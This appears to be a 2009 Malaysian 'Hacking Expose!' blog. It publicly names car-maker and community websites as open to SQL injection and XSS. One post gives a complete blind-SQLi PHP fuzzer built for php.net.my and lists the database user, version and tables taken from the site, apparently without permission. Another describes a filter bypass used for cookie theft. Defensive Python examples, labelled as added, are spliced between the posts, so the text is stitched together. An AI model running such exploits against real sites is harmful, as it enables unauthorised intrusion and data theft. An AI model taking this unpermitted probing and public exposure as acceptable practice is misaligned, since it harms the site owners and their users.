HACKED: www.proton-edar.com.my prone to SQL Injection Attacks

Saturday, March 7, 2009

Website: Proton Edar Sdn Bhd
URL: http://www.proton-edar.com.my/

From Proton Edar:
Proton Edar has achieved commendable success in building the PROTON brand name as the pride of the nation. Proton's success story is a testimony to its product quality and excellent service.

An hour ago I found a vulnerability on Perodua's website; now another one comes in. The similarity between these two companies (if you don't know) is that both are leading car-selling companies in our country. I think the main reason their websites lack security is that they are too busy selling cars. hmm.. ok.. that's acceptable.. Anyway, I myself own a Proton Savvy. =)


Here it is, a screenshot showing the accessible databases. With the user being root, think of what you could do. load_file() and INTO OUTFILE, maybe? =)

HACKED: www.perodua.com.my prone to blind SQL Injection Attacks

Website: Perusahaan Otomobil Kedua Sdn Bhd (PERODUA)
URL: http://www.perodua.com.my/

FROM Perodua:
Perusahaan Otomobil Kedua Sdn Bhd (PERODUA), established in 1993, is a joint venture company between Malaysian and Japanese partners. The shareholders of Perodua are UMW Corporation Sdn Bhd with 38% stake, Daihatsu Motor Co. Ltd. (20%), MBM Resources Bhd (20%), PNB Equity Resources Corporation Sdn Bhd (10%), Mitsui & Co. Ltd (7%) and Daihatsu (Malaysia) Sdn Bhd (5%).

The Perodua Rusa - March 1996
The Perodua Kembara - August 1998
The Perodua Kenari - June 2000
The Perodua Kelisa - August 2001
The Perodua Myvi - May 2005
The Perodua Viva - May 2007
The Perodua Nautica 4WD - May 2008

Hello World. This is my first post relating to blind SQL injection. A great thanks and bow to sifu d3ck4 for helping me understand more about blind SQLi. Well, it's kind of boring to post non-government websites on this site (not thrilling). I hope you guys out there still enjoy reading the blog without the .gov.my sites.. '-_- But anyway, here it is. Perodua.com.my is exposed to blind SQL injection attacks, as we can see from my first screenshot: I injected a 1=1 string, and of course 1=1 will always return true. Then in my second screenshot I injected 1=2, which will return false; let's see if there are any changes on the website. Go on, take a look. =)


Once it's there,



Now it's gone (like a biscuit, this one)



The version is MySQL version 4. I had to use one of my favourite scripts to guess the tables and columns, since we cannot look up table names in information_schema; it's not that efficient, but it does the work for me though. =)
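The two signals in this post (a 1=1 probe and a 1=2 probe returning different pages, then table names guessed one character at a time) are also what a defender can look for in web-server logs. The Python below is an added example, not code from this blog: the log lines, client addresses and paths are constructed, and the script assumes Apache combined-log format with the injected SQL URL-encoded in the query string.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed access-log lines (Apache combined format); addresses and paths are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [07/Mar/2009:21:10:01 +0800] "GET /news.php?id=15 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [07/Mar/2009:21:10:05 +0800] "GET /news.php?id=15%20AND%201=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [07/Mar/2009:21:10:09 +0800] "GET /news.php?id=15%20AND%201=2 HTTP/1.1" 200 4871 "-" "Mozilla/5.0"
203.0.113.7 - - [07/Mar/2009:21:11:01 +0800] "GET /news.php?id=15%20AND%20ascii(substring((database()),1,1))=97 HTTP/1.1" 200 4871 "-" "Mozilla/5.0"
203.0.113.7 - - [07/Mar/2009:21:11:02 +0800] "GET /news.php?id=15%20AND%20ascii(substring((database()),1,1))=98 HTTP/1.1" 200 4871 "-" "Mozilla/5.0"
203.0.113.7 - - [07/Mar/2009:21:11:03 +0800] "GET /news.php?id=15%20AND%20ascii(substring((database()),1,1))=99 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [07/Mar/2009:21:11:04 +0800] "GET /news.php?id=15%20AND%20ascii(substring((database()),2,1))=97 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [07/Mar/2009:21:12:00 +0800] "GET /news.php?id=16 HTTP/1.1" 200 5210 "-" "Mozilla/5.0"
"""

# One combined-log line: client, request line, status and response size.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)')
# Boolean probe: "AND 1=1" (true) or "AND 1=2" (false) appended to a numeric parameter.
BOOL_RE = re.compile(r"\bAND\s+1\s*=\s*([12])\b", re.I)
# Character-extraction probe: ascii(substring(<expr>,<pos>,1))=<code>.
CHAR_RE = re.compile(r"ascii\s*\(\s*substring\s*\(.*?,\s*(\d+)\s*,\s*1\s*\)\s*\)\s*=\s*(\d+)", re.I)


def parse_line(line):
    """Split one log line into client, path, decoded query string, status and size."""
    m = LINE_RE.match(line)
    if not m:
        return None
    target = unquote(m.group("target"))
    path, _, query = target.partition("?")
    return {"ip": m.group("ip"), "path": path, "query": query,
            "status": int(m.group("status")),
            "size": 0 if m.group("size") == "-" else int(m.group("size"))}


def detect_blind_sqli(log_text, min_char_probes=3):
    """Return alerts keyed by (client, path).

    boolean_pair  - the same client sent both 'AND 1=1' and 'AND 1=2' to one
                    path; a differing response size means the oracle is usable.
    char_by_char  - repeated ascii(substring(...,pos,1))=N probes to one path,
                    the automated extraction pattern.
    """
    seen_bool = defaultdict(dict)    # (ip, path) -> {"1": size, "2": size}
    char_probes = defaultdict(list)  # (ip, path) -> [(pos, code), ...]
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["ip"], rec["path"])
        b = BOOL_RE.search(rec["query"])
        if b:
            seen_bool[key][b.group(1)] = rec["size"]
        c = CHAR_RE.search(rec["query"])
        if c:
            char_probes[key].append((int(c.group(1)), int(c.group(2))))

    alerts = {}
    for key, sizes in seen_bool.items():
        if "1" in sizes and "2" in sizes:
            note = " (responses differ)" if sizes["1"] != sizes["2"] else ""
            alerts.setdefault(key, []).append("boolean_pair" + note)
    for key, probes in char_probes.items():
        if len(probes) >= min_char_probes:
            positions = sorted({p for p, _ in probes})
            alerts.setdefault(key, []).append(
                f"char_by_char ({len(probes)} probes, positions {positions[0]}-{positions[-1]})")
    return alerts


if __name__ == "__main__":
    for (ip, path), reasons in detect_blind_sqli(SAMPLE_LOG).items():
        print(ip, path, "->", "; ".join(reasons))
```

The response-size comparison is what makes the boolean pair actionable: if both probes return the same size, the parameter may simply be ignored, whereas a consistent difference is the behaviour the screenshots in this post show.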

HACKED: www.php.net.my prone to Blind SQL Injection Attacks

as this blog gets more and more crowded every single day (ahh.. we are public attention, we're famous ;-), I decided to dig around for "Hacking Expose!" via Google and stumbled upon one well-known community website
at http://www.php.net.my/forum/thread.php/15/3854/1, where one of the posters was shouting out to point to this blog, and his posting sounds like this

http://hackingexpose.blogspot.com/

lots of them are breached via SQL. what's this. it's 2009 already.

then I got curious to know, so the journey begins..

the issue..

Website: Kumpulan Pengguna PHP Malaysia
URL: http://www.php.net.my


the database user() fingerprinting is as follows



so I ended up writing a simple automated exploit for this, in PHP of course, as I'm also a "PHP User in Malaysia" ;-) the exploit can fuzz the supplied parameter (for example table_name, column_name) and tests, character by character, for the first one that returns a true statement. here's the code:


<?php
// Blind (my)SQL injection fuzzer. Run from the PHP CLI as
//   php exploit.php <host> <path> <func>
// after replacing the two placeholders below.

function usage ()
{
    echo "\nBlind (my)SQL Injection Exploit/Fuzzer".
         "\nby 0x3a, hacking.expose@gmail.com\n".
         "\nspecially made for www.php.net.my ;-)".
         "\n\n";
    exit ();
}

function query ($func, $chr, $pos)
{
    // customise the query as you like

    $query = "15 AND ascii(substring((SELECT group_concat({$func}) from information_schema.tables where table_schema=database()),{$pos},1))={$chr}";

    //$query = "15 AND ascii(substring((SELECT group_concat({$func}) from information_schema.columns where table_name=0x63686174746572 limit 0,1),{$pos},1))={$chr}";
    //$query = "15 AND ascii(substring((user()),{$pos},1))={$chr}";
    //$query = "15 AND ascii(substring((database()),{$pos},1))={$chr}";
    //$query = "15 AND ascii(substring((@@version),{$pos},1))={$chr}";

    // URL-encode the characters a web server would otherwise reject
    $query = str_replace (" ", "%20", $query);
    $query = str_replace ("'", "%27", $query);
    return $query;
}

function exploit ($host, $path, $func, $pos, $chr)
{
    $chr = ord ($chr);
    $fp = fsockopen ($host, 80);
    if (!$fp)
    {
        echo "\nCould not connect to {$host}\n";
        exit (1);
    }
    $query = query ($func, $chr, $pos);
    $request = "GET {$path}/replace/path/here/{$query} HTTP/1.1\r\n".
               "Host: {$host}\r\n".
               "Connection: Close\r\n\r\n";

    fputs ($fp, $request);
    $reply = "";
    while (!feof ($fp))
        $reply .= fgets ($fp, 1024);

    fclose ($fp);

    // the page only contains this string when the injected condition was true
    if (preg_match ("/replace your expected string here/", $reply))
        return true;
    else
        return false;
}

if ($argc != 4)
    usage ();

$host = $argv [1];
$path = $argv [2];
$func = $argv [3];
$key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789,-_.";
$pos = 1;
$chr = 0;

echo "\nResult: ";

// one position at a time; stop when no candidate character matches
while ($pos <= 99999 && $chr < strlen ($key))
{
    if (exploit ($host, $path, $func, $pos, $key [$chr]))
    {
        echo $key [$chr];
        $chr = 0;
        $pos++;
    }
    else
        $chr++;
}
echo "\n";
?>

from the automation I came up with the results below (fuzzing the table_name, database and version)



as for the final result:

USER: phpnetmy_main@localhost
DATABASE: phpnetmy
VERSION: 5.0.67-community

TABLES:

chat
chatter
event
event_participants
fm_file
forum_category
forum_file_attach
forum_forums
forum_posts
forum_smileys
forum_smileys_code
forum_temp_attach
forum_topics
hds

the problem is common: the script does not validate user-supplied input before using it in an SQL query. removing the database error message without fixing the core issue is not a solution. php.net.my has been contacted and we are waiting for a reply.


Glossary:

Blind SQL injection is identical to normal SQL injection except that when an attacker attempts to exploit an application, rather than getting a useful error message they get a generic page specified by the developer instead. This makes exploiting a potential SQL injection attack more difficult but not impossible. An attacker can still steal data by asking a series of true and false questions through SQL statements.
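As the note above says, hiding the database error message leaves the hole intact: a true and a false condition still produce different pages, which is all a blind injection needs. The Python below is an added example, not part of the post or of php.net.my's code; it uses an in-memory SQLite table with constructed rows to show the string-built query beside a validated, parameterised one.

```python
import sqlite3

# Constructed sample rows standing in for a site's article table (not any real database).
SAMPLE_ROWS = [(15, "Kenari launch"), (16, "Myvi review"), (17, "Viva test drive")]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)")
    con.executemany("INSERT INTO posts VALUES (?, ?)", SAMPLE_ROWS)
    return con


def lookup_vulnerable(con, user_input):
    """String-concatenated query: the request parameter becomes SQL text.

    Errors are swallowed, mirroring a site that hides database error messages;
    the response still differs between a true and a false condition, which is
    the boolean oracle a blind injection relies on."""
    try:
        sql = f"SELECT title FROM posts WHERE id = {user_input}"
        return [row[0] for row in con.execute(sql)]
    except sqlite3.Error:
        return []


def lookup_hardened(con, user_input):
    """Validate the parameter type, then bind it as a query parameter.

    Returns None for anything that is not an integer id, so both probe strings
    get the same response and no true/false signal leaks. The connection is
    assumed to use a least-privilege database account (no root, no FILE
    privilege) so a query bug cannot escalate to reading or writing files."""
    try:
        post_id = int(user_input)
    except ValueError:
        return None
    rows = con.execute("SELECT title FROM posts WHERE id = ?", (post_id,))
    return [row[0] for row in rows]


def oracle_visible(lookup):
    """True if an attacker can tell a true condition from a false one."""
    con = make_db()
    true_probe = lookup(con, "15 AND 1=1")
    false_probe = lookup(con, "15 AND 1=2")
    return true_probe != false_probe


if __name__ == "__main__":
    print("oracle with string-built query:", oracle_visible(lookup_vulnerable))
    print("oracle with validated parameter:", oracle_visible(lookup_hardened))
```

With the concatenated query the two probes return one row and no rows respectively; with the validated parameter both are rejected before any SQL runs, so there is nothing to compare.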

HACKED: innit.nuffnang.com prone to XSS and possible Blind SQL Injection attacks

Friday, March 6, 2009

Hello World!

life feels incomplete when there's nothing to post here. enough with those pranks, we're done with them (no more pranks, promise ;-). unfortunately we decided to keep calm about those gov sites (slow down cowboy..) because so many people were "loud" when we were exposing them. in fact we were called to pull down all posts related to gov.my (for a while, sorry guys). finished with this pathetic story, so here we go..

as you all well know, Nuffnang.com is Asia's first and leading blog advertising community.

their online platform allows advertisers to serve graphic or video based advertisements onto the thousands of local blogs that are signed up with them.

to date, over 80,000 bloggers have signed up with their platform in Singapore, Malaysia, the Philippines and Australia.

their ranks grow everyday.

their advertiser rollcall includes bluechips such as Citibank, Honda, Walls, AirAsia, Nokia, Nike, Nescafe, Twisties, and more.

beyond blog advertising, they also pride themselves on being a community for bloggers by bloggers.

Nuffnang has been featured on mainstream newspapers like The Star, Malaysia and The Sunday Times, Singapore, amongst other media.

the issue..

Website: Nuffnang Community Blog Aggregator
URL: http://innit.nuffnang.com

from the site

Nuffnang’s very own blog aggregator is here! Innit revolutionalizes the Nuffnang community by helping Nuffnangers build each other’s traffic, share topics, and vote on blog entries they find interesting.

we bumped into this site and found Cross Site Scripting and possible SQL Injection vulnerabilities. in terms of XSS, the script seems to filter out the quote character (') using the addslashes function in PHP, so we ended up bypassing this filter using the ninja String.fromCharCode() JavaScript function. the Proof of Concept is below



and here is the credential information pulled out via the remote xss.js script at ha.ckers.org. this suggests that the risk of cookie stealing is high. (w00t! w00t!)



and for the SQL injection, the script tells the world about its SQL query. this might be prone to blind SQL injection if the injection query is properly reconstructed. as I'm not motivated to do the rest, I'm done here. the problem is common: the script does not filter user input. Nuffnang has been contacted and we are waiting for a reply.




Solution:

fundamentally, this means that all web application output impacted by any user must be filtered (so characters that can cause this problem are removed), encoded (so the characters that can cause this problem are encoded in a way to prevent the problem), or validated (to ensure that only "safe" data gets through). This includes all output derived from input such as URL parameters, form data, cookies, database queries, CORBA ORB results, and data from users stored in files. In many cases, filtering and validation should be done at the input, but encoding can be done during either input validation or output generation. If you're just passing the data through without analysis, it's probably better to encode the data on input (so it won't be forgotten). However, if your program processes the data, it can be easier to encode it on output instead. CERT recommends that filtering and encoding be done during data output; this isn't a bad idea, but there are many cases where it makes sense to do it at input instead. The critical issue is to make sure that you cover all cases for every output, which is not an easy thing to do regardless of approach.
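The XSS finding above and this solution section make the same point: addslashes() protects a SQL string literal, not an HTML page, so a payload with no quote characters passes it untouched, and the fix is encoding for the output context. The Python below is an added example (not Nuffnang's code or the blog's); the comment inputs are constructed, and addslashes() here is a Python re-implementation of the PHP function.

```python
import html
import re

# Constructed comment submissions. The first has the shape the post describes:
# no ' character at all, so a quote filter never fires on it.
SAMPLE_INPUTS = [
    "<script>alert(String.fromCharCode(88,83,83))</script>",
    "Nice post, it's great!",
    '<img src=x onerror="alert(1)">',
]


def addslashes(s):
    """PHP addslashes() equivalent: backslash-escapes ' " \\ and NUL only.
    It was designed for SQL string literals and does nothing about HTML markup."""
    return re.sub(r"(['\"\\\x00])", r"\\\1", s)


def encode_for_html_text(s):
    """Defence for the HTML text context: entity-encode the characters that can
    change the markup, including both quote types (done at output, as the
    solution section recommends)."""
    return html.escape(s, quote=True)


def contains_active_markup(rendered):
    """True if what would be written into the page still opens an HTML tag,
    i.e. the filter did not neutralise it. Every active payload in the text
    context needs a tag opener, so this is the property to check."""
    return re.search(r"<\s*/?[a-z]", rendered, re.I) is not None


def evaluate(filter_fn):
    """For each sample input, whether the filtered output is still dangerous."""
    return [contains_active_markup(filter_fn(s)) for s in SAMPLE_INPUTS]


if __name__ == "__main__":
    for name, fn in (("addslashes", addslashes), ("html.escape", encode_for_html_text)):
        print(f"{name:12s} still dangerous per input: {evaluate(fn)}")
```

Running it shows addslashes() leaving both tag-based inputs live while only mangling the harmless apostrophe, whereas entity encoding neutralises all three; the same approach applies to any other output context (attribute, URL, JavaScript string) with that context's encoder.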



P/S:

Hacking Expose! Team would like to apologize and ask for forgiveness from whom it may concern regarding the full disclosure of government sites (we admit that putting up the uncensored/unblurred screenshots was our biggest mistake). To make it clear, it was never our intention to put everyone at the highest risk. Our main intention is to keep Malaysian sites hacker-safe and raise admin awareness. Peace!

Calm down my fella

Thursday, March 5, 2009

dear contributors, especially admin@vex, and others..

as you have noted these past few weeks, and in future, our blog will receive more and more hits while people keep suggesting, commenting, criticizing, and enjoying reading this blog.

I would like to remind you guys to keep a LOW PROFILE and CLEAR TRACKS of your personal belongings available here. don't do malicious harm to our beloved test server.

so again, be "a little bit ethical and professional" although we are still doing this (we can call it a dirty job here) in implementation, but still keep our intention "pure, clean and sincere", because we are not posting "how to hack/deface .gov.my", nor are we yet another ZONE-h.com.my ;-) remember this tagline:

"AN INTENTION TO KEEP MALAYSIAN SITES HACKER SAFE AND ADMIN AWARENESS!"

so from now on.. I would like to change our assessment, which must commit to and consist of the following steps:

1.) rock on! find your target!

2.) do a simple test.. I mean here as simple as producing an ERROR

3.) report your findings to the admin AS SOON AS YOU FIND ONE!

4.) ask for consent and permission to resume your test, which may lead to your PoC etc.. blah blah blah (I bet you can't get an admin reply either ;-)

5.) zzZZ.. waiting for their patch..........

6.) ask permission to do full disclosure on this blog..

7.) he may ask.. (and your answer: all this is for your and everyone's good sake! we are not yet another AdSense blog though!)

8.) CENSORED! screenshots CENSORED!


until then, bye-bye.. we're off!

P/S: we are waiting for those admin replies; there will be no new posts for now until we get permission to expose. consent, you say?

Should we or should we not?

Monday, March 2, 2009

Should we shut down this blog ASAP, sooner or later, and why?

well, we did a survey of the opinions of various people, who are also my friends and former group members in Malaysia, about this yet another security blog (from end users and leet system admins to senior security consultants).

so from their point of view, lots of pros and cons were discussed about this blog, especially in terms of information disclosure and Malaysian cyber law and acts. so here we would like you, our readers, to submit a poll (on the sidebar) and feel free to write suggestions or criticism as you like in the comment section.


p/s: if not us, who will? "an intention to make Malaysian sites better, hacker safe, and admins aware!"
